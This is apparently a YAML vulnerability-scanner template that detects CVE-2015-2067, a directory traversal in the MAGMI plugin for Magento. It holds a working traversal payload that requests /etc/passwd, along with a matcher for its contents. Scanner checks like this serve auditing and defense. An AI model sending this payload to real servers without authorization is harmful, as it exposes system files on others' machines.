30 lines
904 B
YAML
30 lines
904 B
YAML
id: CVE-2015-2067
|
|
|
|
info:
|
|
name: Magento Server Magmi Plugin - Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/35996
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-2067
|
|
classification:
|
|
cve-id: CVE-2015-2067
|
|
tags: cve,cve2015,lfi,magento,magmi,plugin
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|